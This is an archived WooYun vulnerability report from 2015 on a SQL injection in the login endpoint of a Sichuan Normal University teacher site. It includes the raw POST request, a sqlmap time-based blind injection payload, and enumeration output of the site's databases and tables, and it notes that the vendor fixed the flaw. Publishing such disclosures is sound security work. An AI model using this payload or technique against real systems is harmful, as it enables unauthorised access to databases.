乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-20: 细节已通知厂商并且等待厂商处理中 2015-11-23: 厂商已经确认,细节仅向厂商公开 2015-11-23: 厂商已经修复漏洞并主动公开,细节向公众公开
RT
POST /CheckLogin?rurl=null&set=login HTTP/1.1Content-Length: 224Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://teacher.sicnu.edu.cnCookie: JSESSIONID=CF00B4FF8F87BC55D0B53B681E63E44C; CNZZDATA1000148100=1781699265-1447733262-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1447733262Host: teacher.sicnu.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*md5=&user_bh=&user_gid=&user_id=*&user_lbm=&user_name=&user_nj=&user_role_list=&user_zcm=&user_zwm=
user_id参数存在注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: md5=&user_bh=&user_gid=&user_id=' AND (SELECT * FROM (SELECT(SLEEP(5)))wTey) AND 'GAHY'='GAHY&user_lbm=&user_name=&user_nj=&user_role_list=&user_zcm=&user_zwm=---back-end DBMS: MySQL 5.0.12available databases [3]:[*] information_schema[*] mysql[*] sicnu_jssq
---back-end DBMS: MySQL 5.0.12Database: sicnu_jssq[21 tables]+--------------+| comments || counter || course || course_class || focus || ip_control || jzg || jzg_announce || jzg_class || link || photo || photo_class || vote || vote_class || vote_content || wdc_class || wdc_level || wdc_log || wdc_mail || wdc_online || wdc_sclass |+--------------+Database: sicnu_jssq+--------------+---------+| Table | Entries |+--------------+---------+| wdc_sclass | 294 || course | 281 || course_class | 95 || wdc_class | 59 || counter | 37 || jzg | 37 || wdc_log | 6 || photo | 2 || photo_class | 2 || vote | 2 || vote_class | 1 |+--------------+---------+
危害等级:低
漏洞Rank:5
确认时间:2015-11-23 10:34
感谢支持!
2015-11-23:已修复,谢谢支持!